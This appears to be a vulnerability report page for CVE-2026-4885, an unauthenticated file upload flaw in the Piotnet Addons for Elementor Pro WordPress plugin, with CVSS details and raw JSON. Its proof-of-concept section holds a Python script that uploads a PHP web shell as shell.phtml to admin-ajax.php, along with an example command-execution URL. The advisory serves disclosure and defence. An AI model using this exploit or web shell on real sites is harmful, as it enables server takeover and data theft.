Security Vulnerability Report
中文
CVE-2026-4885 CVSS 9.8 CRITICAL

CVE-2026-4885

Published: 2026-05-19 08:16:16
Last Modified: 2026-05-19 14:38:40
Source: [email protected]

Description

The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Piotnet Addons for Elementor Pro <= 7.1.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com" upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload: A simple PHP webshell saved as .phtml to bypass blacklist # The blacklist blocks .php but often misses .phtml or .phar file_content = "<?php system($_GET['cmd']); ?>" files = { 'file': ('shell.phtml', file_content, 'application/octet-stream') } # Data required to trigger the vulnerable function data = { 'action': 'pafe_ajax_form_builder', 'form_data': '...' # Additional form data if required } try: response = requests.post(upload_endpoint, files=files, data=data) if response.status_code == 200: print("[+] File upload request sent successfully.") print("[+] Check the upload directory or response for the file path.") # Example execution: http://example.com/wp-content/uploads/2026/05/shell.phtml?cmd=whoami else: print("[-] Failed to send request.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4885", "sourceIdentifier": "[email protected]", "published": "2026-05-19T08:16:16.223", "lastModified": "2026-05-19T14:38:39.660", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://pafe.piotnet.com/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffff2ff3-769d-4eb2-acbe-d8ce6f042581?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.